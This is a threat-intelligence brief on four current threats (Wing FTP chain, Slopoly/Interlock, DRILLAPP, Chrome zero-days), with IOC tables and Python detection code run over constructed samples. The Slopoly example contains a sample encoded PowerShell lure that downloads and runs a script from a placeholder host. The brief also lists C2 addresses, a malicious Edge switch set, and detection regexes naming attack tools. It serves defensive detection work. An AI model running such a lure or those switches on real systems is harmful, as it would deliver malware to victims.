Cyber Threat Brief — March 17 2026
1. Wing FTP Server Exploit Chain — CVE-2025-47813 + CVE-2025-47812
Summary
Wing FTP Server is back in the spotlight with a two-punch exploit chain that CISA formalized yesterday. CVE-2025-47813 (information disclosure via an oversized UID cookie) leaks the server’s local installation path: trivial on its own, devastating as a setup for CVE-2025-47812, the CVSS 10.0 RCE that has been exploited in the wild since July 2025. The PoC is public. The chain is live. If you have the Wing FTP web interface exposed, treat this as a fire drill.
What’s New (Last 24 Hours)
- 2026-03-16: CISA added CVE-2025-47813 to the KEV catalog, giving FCEB agencies until 2026-03-30 to patch.
- Chain exploitation confirmed: the path leaked by CVE-2025-47813 feeds directly into CVE-2025-47812, whose payload runs as root/SYSTEM because the Wing FTP service runs with those privileges by default. Unauthenticated exploitation requires anonymous FTP accounts to be enabled; otherwise any valid user credentials suffice.
- PoC for CVE-2025-47813 publicly available: https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-47813.txt
- Researcher Julien Ahrens confirmed the chain mechanism and shared technical writeup.
- Fix available in Wing FTP Server v7.4.4 (patched May 2025).
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| UID cookie with oversized value (error message leaks install path) | TTP | T1190 | Web/App server access logs | Alert on Wing FTP web-interface access logs showing abnormally long UID cookie values that trigger error responses containing local paths; a legitimate UID is a short session token |
| Wing FTP web interface response containing C:\Program Files\Wing FTP Server\ or a similar local path string | IOC | T1190 | Web proxy / DLP | Hunt proxy logs for HTTP responses from the Wing FTP web listeners (the admin console defaults to 5466; use the ports configured in your deployment) that leak filesystem paths. FTP (21) and SFTP (22) sessions never carry this HTTP response, so they are out of scope for this hunt |
| Unauthenticated POST to the Wing FTP web login handler with a NUL byte in the username field, leading to command execution (CVE-2025-47812) | TTP | T1190 | Web/App server logs, EDR | Alert on the Wing FTP process spawning child processes (cmd.exe, powershell.exe, sh) shortly after a web request; the malicious login request itself is only visible in the web interface's own logs |
| wftpserver.exe spawning unexpected child processes | TTP | T1059 | EDR process telemetry | Baseline the normal Wing FTP process tree; alert on any non-standard child process, especially shells and script interpreters |
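The two stages in the table above as detection logic run over sample telemetry. This is an added example written for this brief, not code from Wing FTP, CISA or the advisory: the access-log layout, the EDR field names (parent_image, image, cmdline) and the 64-byte UID threshold are assumptions, and every sample line is constructed.

```python
import re
from dataclasses import dataclass

# Assumption for this example: a genuine Wing FTP UID cookie is a short session token,
# so anything past this length is treated as a probe.
UID_MAX_LEN = 64
UID_COOKIE_RE = re.compile(r'(?:^|;\s*)UID=([^;\s]*)', re.IGNORECASE)
FS_PATH_RE = re.compile(r'(?:[A-Za-z]:\\[^\s"\'<>]+|/(?:usr|opt|var|home|etc)/[^\s"\'<>]+)')
# Constructed access-log layout (not Wing FTP's native format):
#   <client> <status> "<request line>" cookie="<Cookie header>" resp="<response excerpt>"
LINE_RE = re.compile(r'^(?P<src>\S+) (?P<status>\d{3}) "(?P<req>[^"]*)" '
                     r'cookie="(?P<cookie>[^"]*)" resp="(?P<resp>[^"]*)"$')
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "dash", "python", "python3", "perl"}


@dataclass(frozen=True)
class Alert:
    rule: str
    detail: str


def _basename(path: str) -> str:
    """Last path component for either Windows or POSIX separators, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_access_line(line: str) -> list:
    """Stage 1 (CVE-2025-47813): oversized UID cookie, and an error response echoing a path."""
    m = LINE_RE.match(line)
    if not m:
        return []
    alerts = []
    uid = UID_COOKIE_RE.search(m["cookie"])
    if uid and len(uid.group(1)) > UID_MAX_LEN:
        alerts.append(Alert("wingftp_oversized_uid_cookie",
                            f'{m["src"]} sent a UID cookie of {len(uid.group(1))} bytes'))
    path = FS_PATH_RE.search(m["resp"])
    if path and m["status"][0] in "45":  # only error pages should ever echo a path
        alerts.append(Alert("wingftp_path_disclosure",
                            f'{m["src"]} got HTTP {m["status"]} containing {path.group(0)}'))
    return alerts


def check_process_event(ev: dict) -> list:
    """Stage 2 (CVE-2025-47812 outcome): the Wing FTP service spawning a shell or interpreter.
    `ev` mimics an EDR process-creation record (constructed field names)."""
    parent = _basename(ev.get("parent_image", ""))
    child = _basename(ev.get("image", ""))
    if parent in {"wftpserver.exe", "wftpserver"} and child in SHELLS:
        return [Alert("wingftp_spawns_shell",
                      f'{ev["parent_image"]} -> {ev["image"]} {ev.get("cmdline", "")}'.rstrip())]
    return []


# Constructed sample telemetry: a normal login, a probe with a 300-byte UID whose error
# page leaks the install path, a shell spawned by the service, and a benign child process.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 200 "GET /login.html" cookie="UID=a1b2c3d4e5f6" resp="<html>Login</html>"',
    '203.0.113.7 500 "GET /login.html" cookie="UID=' + "A" * 300
    + '" resp="error opening C:\\Program Files\\Wing FTP Server\\session\\..."',
]
SAMPLE_PROCESS_EVENTS = [
    {"parent_image": r"C:\Program Files\Wing FTP Server\wftpserver.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent_image": r"C:\Program Files\Wing FTP Server\wftpserver.exe",
     "image": r"C:\Program Files\Wing FTP Server\wftpserver.exe", "cmdline": ""},
]


def run_all() -> list:
    """Run both detections over the constructed samples and return the alerts in order."""
    alerts = []
    for line in SAMPLE_ACCESS_LOG:
        alerts.extend(check_access_line(line))
    for ev in SAMPLE_PROCESS_EVENTS:
        alerts.extend(check_process_event(ev))
    return alerts


if __name__ == "__main__":
    for a in run_all():
        print(f"[{a.rule}] {a.detail}")
```

The stage-1 rule fires twice on the probe (long cookie, then the leaked path in the 500 page); the stage-2 rule keys on parent image only, so it stays useful even if the attacker never sends a second web request your logging can see.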
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | Web or Application Server Spawning a Shell | Covers the RCE stage: detects when a web/FTP server process (like wftpserver.exe) spawns shell interpreters — the primary indicator of CVE-2025-47812 exploitation in progress. |
| Elastic | Suspicious Child Execution via Web Server | Detects shell spawning from web server processes; applies to post-exploitation via CVE-2025-47812 on Linux deployments of Wing FTP. |
| Sigma | Suspicious Process By Web Server Process | Flags suspicious processes spawned by web-tier processes; with field tuning to include wftpserver.exe as a parent, covers the RCE exploitation outcome. No direct Wing FTP–specific rule exists; gap coverage via generic web-server-child-process detection. |
2. Hive0163 / Slopoly — AI-Generated C2 Malware + Interlock Ransomware
Summary
IBM X-Force dropped a report on “Slopoly,” a PowerShell C2 client that bears all the hallmarks of LLM generation — verbose comments, clean error handling, an unused Jitter function, and a file path under C:\ProgramData\Microsoft\Windows\Runtime\ that would make a human operator blush. The group behind it (Hive0163) chains ClickFix social engineering → JunkFiction loader → NodeSnake backdoor → Slopoly for persistent C2 → Interlock ransomware + AzCopy exfil. The IOCs are fresh and the attack chain is well-documented.
What’s New (Last 24 Hours)
- IBM X-Force published the full technical report on Slopoly (2026-03-16/17).
- Slopoly drops to C:\ProgramData\Microsoft\Windows\Runtime\ with persistence via a scheduled task named “Runtime Broker”.
- C2 infrastructure: plurfestivalgalaxy[.]com (deactivated); IPs 94.156.181[.]89, 77.42.75[.]119, 23.227.203[.]123, 172.86.68[.]64.
- ClickFix initial access: a fake CAPTCHA prompts the victim to press Win+R and execute clipboard-pasted PowerShell.
- Attack chain: ClickFix → JunkFiction loader → NodeSnake (Node.js backdoor, HTTP POST C2) → Slopoly → Interlock ransomware → AzCopy (data exfil) + Advanced IP Scanner (recon).
- Interlock is delivered as a 64-bit PE wrapped in JunkFiction and dropped to %TEMP%.
- The Win+R ClickFix step populates the RunMRU registry key; defenders can hunt HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU for unusual entries.
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| C:\ProgramData\Microsoft\Windows\Runtime\ (Slopoly drop path) | TTP | T1036.005 | EDR file/process telemetry | Alert on script execution from this path; it is not a directory Windows components create or write to, so any activity there is suspect |
| Scheduled task named “Runtime Broker” (masquerading as a system component) | TTP | T1053.005 | Windows Security event 4698 (requires task-creation auditing) or Microsoft-Windows-TaskScheduler/Operational event 106 | Alert on task creation with the name “Runtime Broker” by non-SYSTEM subjects; RuntimeBroker.exe is a process, not a scheduled task, so there is no legitimate task by that name |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU with encoded PowerShell | IOC | T1059.001 | Windows Registry / EDR | Periodically collect RunMRU values and flag base64 -EncodedCommand, mshta or powershell strings; the Win+R dialog records what the victim pasted, so this survives even if the process itself was short-lived |
| 94.156.181[.]89, 77.42.75[.]119, 23.227.203[.]123, 172.86.68[.]64 | IOC | T1071.001 | Firewall / proxy / NDR | Block and alert on outbound connections to these IPs; correlate with PowerShell processes |
| plurfestivalgalaxy[.]com | IOC | T1071.001 | DNS / proxy | DNS block and alert; the domain is reported deactivated, so its main value is retrospective hunting |
| AzCopy.exe executing with a cloud storage destination | TTP | T1537 | EDR process telemetry | Alert on AzCopy spawned by non-admin users or from unusual parent processes (loader, svchost); AzCopy is a legitimate Microsoft tool, so baseline authorised use first |
| Advanced IP Scanner execution prior to ransomware | TTP | T1046 | EDR process telemetry | Flag Advanced IP Scanner execution outside IT-admin hours or from unexpected user accounts |
| JunkFiction loader dropped to %TEMP%\ as a 64-bit PE | TTP | T1027 | EDR file events | Alert on PE files written to TEMP by browser or Office parent processes |
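The RunMRU and scheduled-task rows above as a small hunt. This is an added example, not code or IOCs from the IBM X-Force report: it parses the RunMRU value layout (single-letter values ending in `\1`, ordered by the MRUList value), decodes PowerShell -EncodedCommand payloads before matching the Slopoly drop path, and checks constructed Security 4698 records. The lure command, the script filename under the drop path, the 4698 field subset and the regexes are this example's assumptions.

```python
import base64
import re
from typing import Optional

# Commands a ClickFix lure typically pushes into the Win+R box (assumption: tune to your estate).
SUSPECT_RE = re.compile(r"\b(powershell|pwsh|mshta|cmd(?:\.exe)?\s+/c|curl|certutil|bitsadmin|"
                        r"rundll32|regsvr32|wscript|cscript)\b", re.IGNORECASE)
# -EncodedCommand and the common prefixes PowerShell accepts for it, then the base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|enco|encod|encode|encoded(?:command)?)\s+([A-Za-z0-9+/=]{16,})",
                    re.IGNORECASE)
SLOPOLY_PATH = "c:\\programdata\\microsoft\\windows\\runtime\\"
SYSTEM_ACCOUNTS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}


def decode_encoded_command(cmd: str) -> Optional[str]:
    """PowerShell's -EncodedCommand is base64 over UTF-16LE text; return the plaintext or None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_runmru(values: dict) -> list:
    """Return Win+R history most-recent-first. On disk each entry is a single-letter value
    holding '<command>\\1', and MRUList holds the letters in recency order."""
    order = [c for c in values.get("MRUList", "") if c in values]
    order += [k for k in values if len(k) == 1 and k not in order]  # entries missing from MRUList
    return [values[k][:-2] if values[k].endswith("\\1") else values[k] for k in order]


def hunt_runmru(values: dict) -> list:
    """Flag RunMRU entries matching ClickFix patterns; decode -enc payloads so the IOC
    check sees the real command rather than base64."""
    findings = []
    for cmd in parse_runmru(values):
        if not SUSPECT_RE.search(cmd):
            continue
        decoded = decode_encoded_command(cmd)
        findings.append({"command": cmd, "decoded": decoded,
                         "slopoly_path": SLOPOLY_PATH in (decoded or cmd).lower()})
    return findings


def check_task_created(ev: dict) -> list:
    """Security event 4698 fields (constructed subset): SubjectUserName, TaskName, Command.
    Flags the 'Runtime Broker' masquerade from a non-SYSTEM subject and any action under the
    Slopoly drop path; returns the list of reasons (empty means nothing suspicious)."""
    reasons = []
    name = ev.get("TaskName", "").rsplit("\\", 1)[-1].strip().lower()
    if name == "runtime broker" and ev.get("SubjectUserName", "").upper() not in SYSTEM_ACCOUNTS:
        reasons.append(f"task named 'Runtime Broker' registered by {ev.get('SubjectUserName')}")
    if SLOPOLY_PATH in ev.get("Command", "").lower():
        reasons.append("task action lives under the Slopoly drop path")
    return reasons


# Constructed samples (not IOCs from the report): a ClickFix-style encoded command that
# stages a script under the Slopoly path, plus one masquerading and one benign 4698 event.
LURE_PLAINTEXT = ("iex (irm https://lure.example.invalid/x); "
                  "C:\\ProgramData\\Microsoft\\Windows\\Runtime\\c.ps1")
LURE_ENCODED = base64.b64encode(LURE_PLAINTEXT.encode("utf-16-le")).decode()
SAMPLE_RUNMRU = {"MRUList": "cba", "a": "notepad\\1", "b": "cmd\\1",
                 "c": "powershell -w hidden -ep bypass -enc " + LURE_ENCODED + "\\1"}
SAMPLE_4698 = [
    {"SubjectUserName": "jdoe", "TaskName": "\\Runtime Broker",
     "Command": "powershell.exe -w hidden -f C:\\ProgramData\\Microsoft\\Windows\\Runtime\\c.ps1"},
    {"SubjectUserName": "SYSTEM", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "Command": "%windir%\\system32\\defrag.exe"},
]

if __name__ == "__main__":
    for finding in hunt_runmru(SAMPLE_RUNMRU):
        print("RunMRU:", finding)
    for ev in SAMPLE_4698:
        print(ev["TaskName"], "->", check_task_created(ev) or "ok")
```

Decoding before matching matters: the drop path never appears in the registry value itself when the lure uses -EncodedCommand, so a plain string search on RunMRU would miss it. Stripping the trailing `\1` keeps the decoded base64 intact; without it the last token fails validation.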
3. Laundry Bear / DRILLAPP: Headless-Edge DevTools Backdoor (UAC-0190, Void Blizzard)
Summary
Russia-linked Laundry Bear (UAC-0190, Void Blizzard) has a new JavaScript backdoor called DRILLAPP that’s genuinely clever: it launches Microsoft Edge in headless mode with DevTools Protocol enabled, uses Pastefy as a dead-drop C2 resolver, and leverages the browser’s own APIs to capture files, microphone audio, webcam images, and screenshots — all without writing a traditional RAT to disk. The lure themes are judicial/charity-flavored, timed for Ukrainian targets. The EDR detection angle is juicy: msedge.exe with suspicious command-line flags is the tell.
What’s New (Last 24 Hours)
- S2 Grupo LAB52 published full technical analysis (2026-03-16); Security Affairs corroborated 2026-03-17.
- Two campaign variants observed (early and late February 2026):
  - V1: LNK → HTA in %TEMP% → remote script fetched from Pastefy → Edge launched headless
  - V2: Windows Control Panel modules (.cpl) replace the LNK files; adds recursive file enumeration and batch upload
- Persistence: LNK files copied to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
- C2 via a WebSocket URL fetched dynamically from the Pastefy dead-drop resolver
- Device fingerprinting via canvas fingerprinting on first run; timezone-based country check (specifically for Ukraine)
- Edge launched with: --no-sandbox --disable-web-security --allow-file-access-from-files --use-fake-ui-for-media-stream --auto-select-screen-capture-source=true --disable-user-media-security --remote-debugging-port=<PORT>
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| msedge.exe spawned with --remote-debugging-port and --no-sandbox flags | TTP | T1218 | EDR process telemetry (command line) | Alert on any msedge.exe launch whose command line includes --remote-debugging-port or --no-sandbox --disable-web-security; browser-automation hosts (test runners, RPA) use the same switches, so verify and exclude them rather than lowering the rule |
| LNK file in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ | TTP | T1547.001 | EDR file events | Alert on .lnk files written to the Startup folder by non-installer processes |
| HTA file created in %TEMP% | TTP | T1218.005 | EDR file/process events | Alert on .hta creation in TEMP followed by mshta.exe execution |
| DNS/HTTPS requests to pastefy.app from browser or non-user processes | IOC | T1102.001 | DNS logs / proxy | Flag pastefy.app in process-correlated DNS/web logs, especially from msedge.exe or mshta.exe |
| WebSocket C2 connection established by headless Edge | TTP | T1071.001 | NDR / proxy | Monitor for WebSocket upgrades (Upgrade: websocket header) initiated by msedge.exe in non-interactive sessions; over TLS the upgrade is only visible where traffic is inspected, so pair this with the process-level rules |
| .cpl file execution (V2 variant) | TTP | T1218.002 | EDR process events | Alert on Control Panel items executed from user-writable paths (Downloads, TEMP, Desktop) |
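The first row of the table above as a scored command-line detection, added here as an example and not taken from the LAB52 or Security Affairs analysis. The switch list is the one reported above; the weights, the alert threshold, the added --headless switch (assumed, since the page says Edge runs headless) and the suspicious-parent list are this example's assumptions, and the three process records are constructed.

```python
import re

# Chromium switches the analysis above reports DRILLAPP passing to Edge, with weights
# (assumption: the weights are this example's, not LAB52's). --headless is included on the
# assumption that the DevTools session is launched headless; it scores low because
# legitimate automation uses it constantly.
WEIGHTS = {
    "--remote-debugging-port": 5,
    "--no-sandbox": 3,
    "--disable-web-security": 3,
    "--allow-file-access-from-files": 2,
    "--use-fake-ui-for-media-stream": 2,
    "--auto-select-screen-capture-source": 2,
    "--disable-user-media-security": 2,
    "--headless": 1,
}
ALERT_THRESHOLD = 5  # the debugging port alone, or two sandbox-weakening switches together
BROWSERS = {"msedge.exe", "chrome.exe"}
# Parents that should never be launching a browser with these switches (assumption).
SCRIPT_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe",
                  "rundll32.exe", "control.exe"}
SWITCH_RE = re.compile(r'(?<!\S)--([A-Za-z0-9-]+)(?:=("[^"]*"|\S*))?')


def basename(path: str) -> str:
    """Last path component for Windows or POSIX separators, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_switches(cmdline: str) -> dict:
    """Map each --switch to its value ('' when bare); later duplicates win, as in Chromium."""
    return {"--" + name.lower(): value.strip('"') for name, value in SWITCH_RE.findall(cmdline)}


def score_browser_launch(ev: dict):
    """Score a process-creation record (constructed fields: image, parent_image, cmdline).
    Returns None for non-browser images, else the score, the matched switches and the
    DevTools port so the analyst can see what an attacker would connect to."""
    if basename(ev.get("image", "")) not in BROWSERS:
        return None
    sw = parse_switches(ev.get("cmdline", ""))
    hits = [s for s in WEIGHTS if s in sw]
    score = sum(WEIGHTS[s] for s in hits)
    parent = basename(ev.get("parent_image", ""))
    if parent in SCRIPT_PARENTS:
        score += 3
        hits.append("parent=" + parent)
    return {"score": score, "hits": hits,
            "debug_port": sw.get("--remote-debugging-port"),
            "alert": score >= ALERT_THRESHOLD}


# Constructed process-creation records (not telemetry from the campaign): an ordinary
# user launch, a DRILLAPP-style launch from mshta.exe, and a Node-driven test browser.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": '"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --profile-directory=Default'},
    {"image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'msedge.exe --headless --no-sandbox --disable-web-security --allow-file-access-from-files '
                '--use-fake-ui-for-media-stream --auto-select-screen-capture-source=true '
                '--disable-user-media-security --remote-debugging-port=9222 "C:\\Users\\u\\AppData\\Local\\Temp\\p.html"'},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": "chrome.exe --headless=new --remote-debugging-port=0 about:blank"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["parent_image"]), "->", score_browser_launch(ev))
```

The third record shows the tuning problem the table row warns about: a test runner with a DevTools port scores above the threshold too. Handle that with a verified allowlist of automation parents rather than by dropping the weight on --remote-debugging-port, because the port is the one switch DRILLAPP cannot do without.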
4. Google Chrome Zero-Days CVE-2026-3909 & CVE-2026-3910 (Skia + V8, Actively Exploited)
Summary
Google shipped an emergency Chrome update last week to patch two CVSS 8.8 zero-days already being exploited in the wild. CVE-2026-3909 is an out-of-bounds write in the Skia graphics library (crafted HTML triggers OOB memory access), and CVE-2026-3910 is an inappropriate implementation in V8 that enables sandbox-contained code execution via crafted HTML. CISA added both to KEV on March 13 (FCEB deadline March 27). No attribution yet, no exploit code public. Update to Chrome 146.0.7680.75/76. Edge, Brave, Opera, Vivaldi users — watch your respective update channels.
What’s New (Last 24 Hours)
- CISA KEV addition confirmed 2026-03-13 (FCEB patch deadline: 2026-03-27).
- Emergency patch: Chrome 146.0.7680.75/76 (Windows/macOS), 146.0.7680.75 (Linux).
- Google confirmed in-wild exploitation for both; no public exploit code or threat actor attribution.
- This is Chrome’s 3rd actively exploited zero-day of 2026 (prior: CVE-2026-2441 in February).
- All Chromium-based browsers (Edge, Brave, Opera, Vivaldi) affected until vendor patches ship.
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| Chrome version below 146.0.7680.75 | TTP | T1203 | Asset inventory / EDR software version telemetry | Hunt for endpoints running Chrome < 146.0.7680.75 as priority patch targets; compare versions as integer fields, not strings, or a build such as .9 sorts above .75. Block browser launch on outdated versions if policy allows |
| Crafted HTML page triggering unusual memory access (browser crash/restart loop) | TTP | T1189 | Web proxy / browser telemetry | Alert on browser crash events (crash dumps) correlated with new site visits or email-linked URLs; a reliable exploit usually does not crash the renderer, so treat this as low-fidelity retrospective hunting rather than a primary detection |
| Browser process spawning an unexpected child process after a crash or an unusual HTML render | TTP | T1203 | EDR process telemetry | Monitor chrome.exe / msedge.exe for child process spawning (cmd.exe, powershell.exe, etc.); a renderer exploit still needs a sandbox escape before it can do this, so a hit here means the full chain succeeded |
| Network connections from the browser process to non-CDN IPs immediately after a page load from an unknown domain | TTP | T1071.001 | Proxy / NDR | Baseline browser connection patterns; alert on short-lived browser connections to IPs with no prior reputation |
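The version-inventory hunt in the first row above, as an added example written for this brief and not code from Google or CISA. It parses the four-part Chrome version, compares it numerically against the fixed builds listed in the summary, and keeps unparseable or unknown-platform rows separate so they cannot be mistaken for patched hosts; the inventory rows are constructed.

```python
import re

# Minimum fixed builds from the advisory above: 146.0.7680.75/76 on Windows and macOS,
# 146.0.7680.75 on Linux. The lower of each pair is the patched floor.
FIXED = {
    "windows": (146, 0, 7680, 75),
    "macos": (146, 0, 7680, 75),
    "linux": (146, 0, 7680, 75),
}
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)$")


def parse_version(text: str) -> tuple:
    """Chrome versions are four dotted integers; compare them as integer tuples, never as
    strings, or '146.0.7680.9' sorts above '146.0.7680.75' and hides an exposed host."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparseable Chrome version: {text!r}")
    return tuple(int(part) for part in m.groups())


def is_exposed(version: str, platform: str) -> bool:
    """True when the installed build is older than the fixed build for that platform."""
    return parse_version(version) < FIXED[platform.lower()]


def triage(inventory) -> tuple:
    """inventory: (host, platform, version) rows as an asset system might export (constructed).
    Returns the exposed hosts and the rows that could not be evaluated, so a bad record is
    never silently counted as patched."""
    exposed, unevaluated = [], []
    for host, platform, version in inventory:
        try:
            if is_exposed(version, platform):
                exposed.append((host, version))
        except (ValueError, KeyError) as err:
            unevaluated.append((host, str(err)))
    return exposed, unevaluated


# Constructed inventory rows (not real hosts).
SAMPLE_INVENTORY = [
    ("ws-001", "windows", "146.0.7680.76"),   # patched Windows build
    ("ws-002", "windows", "146.0.7680.9"),    # exposed; a string comparison would say otherwise
    ("ws-003", "macos", "145.0.7632.100"),    # exposed, older major
    ("srv-01", "linux", "146.0.7680.75"),     # patched Linux build
    ("ws-004", "windows", "146.0.7680"),      # malformed record
    ("ws-005", "chromeos", "146.0.7680.75"),  # platform outside the advisory's table
]

if __name__ == "__main__":
    exposed_hosts, needs_review = triage(SAMPLE_INVENTORY)
    print("exposed:", exposed_hosts)
    print("needs review:", needs_review)
```

The same integer comparison applies to the Chromium-based browsers listed above once their vendors publish fixed builds; only the FIXED table changes.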
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | None found | No Splunk ESCU rule exists directly for Skia/V8 browser exploit telemetry. Recommend using Software Inventory detection for version-based patching compliance and correlating with browser crash logs. |
| Elastic | Suspicious Browser Child Process | Partial coverage: covers post-exploitation child process spawning from browser processes on macOS. No equivalent Windows rule exists. Extend to Windows by adding Chrome/Edge process parent correlation. |
| Sigma | Suspicious Browser Child Process - MacOS, Antivirus Exploitation Framework Detection | Browser child process rule is macOS-only; AV exploitation detection depends on endpoint AV telemetry. Primary gap: no Windows-targeted browser exploit detection rule exists for this CVE pair. Best current coverage is version-based inventory + crash correlation. |